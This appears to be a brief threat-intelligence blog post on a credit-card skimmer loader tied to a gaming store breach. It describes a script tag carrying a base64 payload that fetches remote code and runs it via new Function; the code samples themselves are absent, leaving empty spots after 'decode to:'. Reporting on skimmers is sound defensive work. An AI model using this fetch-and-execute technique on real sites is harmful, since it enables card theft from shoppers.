Just a quick post on a digital skimmer loader that is somewhat unique. The threat actor used a script tag with a base64 encoded payload.

When run, that will decode to:

Which does a GET to that endpoint and executes the returned code with new Function(data).call(this).

URLScan of the loader: https://urlscan.io/result/e8587511-1e1a-400a-a6e1-3b964eba0143/#transactions

BleepingComputer’s article on this skimmer: https://www.bleepingcomputer.com/news/security/scuf-gaming-store-hacked-to-steal-credit-card-info-of-32-000-customers/

A modified version of this was originally posted on Twitter: https://twitter.com/AffableKraut/status/1451622631715835904